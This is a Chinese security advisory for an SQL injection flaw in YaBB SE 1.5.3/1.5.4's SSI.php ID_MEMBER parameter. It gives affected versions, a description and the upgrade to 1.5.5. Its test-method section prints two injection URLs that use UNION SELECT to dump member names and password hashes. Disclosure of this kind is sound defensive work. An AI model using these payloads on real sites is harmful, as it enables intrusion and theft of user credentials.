安全研究

安全漏洞
YABB SE SSI.php ID_MEMBER参数SQL注入漏洞

发布日期:2004-01-19
更新日期:2004-02-02

受影响系统:
YaBB YaBB SE 1.5.4
YaBB YaBB SE 1.5.3
不受影响系统:
YaBB YaBB SE 1.5.5
描述:
BUGTRAQ  ID: 9449

Yabb Se是一款基于PHP/MySQL的论坛程序。

Yabb Se包含的SSI.php没有充分过滤用户提交的URI参数,远程攻击者可以利用这个漏洞进行SQL注入攻击,可能获得敏感信息或修改数据库。

SSI.php文件返回一些论坛最近论题,版面统计等一些信息,由于对ID_MEMBER参数缺少充分的过滤,攻击者可以提交恶意SQL命令,更改原有数据库逻辑,获得敏感信息或修改数据库。

<*来源:backspace (backspace_2k@terra.es
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=107454067626384&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

backspace (backspace_2k@terra.es)提供了如下测试方法:

http://vulnhost/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1+OR+1=2)+LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_BOARD=t.ID_BOARD+AND+lmr.ID_MEMBER=1+OR+1=2)+WHERE+m.ID_MSG+IN+(2,1)+AND+t.ID_TOPIC=m.ID_TOPIC+AND+b.ID_BOARD=t.ID_BOARD+UNION+SELECT+ID_MEMBER,+memberName,null,passwd,null,passwd,null,null,null,null,null,null+FROM+yabbse_members+/*



http://vulnhost/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1+OR+1=1)+LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_BOARD=t.ID_BOARD+AND+lmr.ID_MEMBER=1+OR+1=1)+UNION+SELECT+ID_MEMBER,+memberName,null,passwd,null,passwd,null,null,null,null,null,null+FROM+yabbse_members+/*

建议:
厂商补丁:

YaBB
----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载升级到YABB SE 1.5.5:

http://www.yabbse.org/community/index.php?thread=27122

浏览次数:4102
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障